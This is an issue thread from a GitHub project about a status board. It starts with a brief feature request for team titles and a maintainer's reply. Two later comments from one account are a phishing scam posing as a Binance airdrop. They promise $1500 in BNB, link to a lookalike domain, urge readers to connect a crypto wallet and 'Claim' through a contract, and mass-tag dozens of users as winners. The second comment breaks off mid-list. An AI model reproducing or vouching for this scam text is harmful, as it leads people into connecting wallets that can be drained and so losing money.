### ISSUE TITLE
[Feature request] Team title

### ISSUE THREAD

**Issue by rossjones** [Sourceless/colony-statusboard#1]
Might be useful to have a team title.

**Comment by Sourceless** [comment]
Agreed - this will be part of the teams update (basically adding another model called teams which users belong to, including admin(s) etc)

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @EpLiar, @paranoidsp, @FavilleFarm, @diogopms, @ElfEars, @a232319779, @gmoney1101, @jonasstrehle, @pqteru, @macedot, @rovo79, @hichnik, @ondrejsika, @3rdEye-Global, @tomyhometown, @MrHeer, @MDABUSAEID, @unimatrixZxero, @noisypillow, @sp213, @fpolanco, @GoneUp, @xanf-code, @Betcheg, @Wgel, @fajar84, @codentacos, @micaelmalta, @alecs297, @ralphtheninja, @tremuddie, @jclemens24, @shegeley, @SimonOsaka, @MikeGolden, @alinvf18, @Hussein35667, @tommyliu9, @LetsJustPlayer, @Shmalzfinger, @ProllyGlews, @freakeinstein, @sy3c4ll, @ab-noori, @DingHanyang, @geofmureithi-zz, @mikebusse, @leviance, @gedeondoescode, @IDebugErrors

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
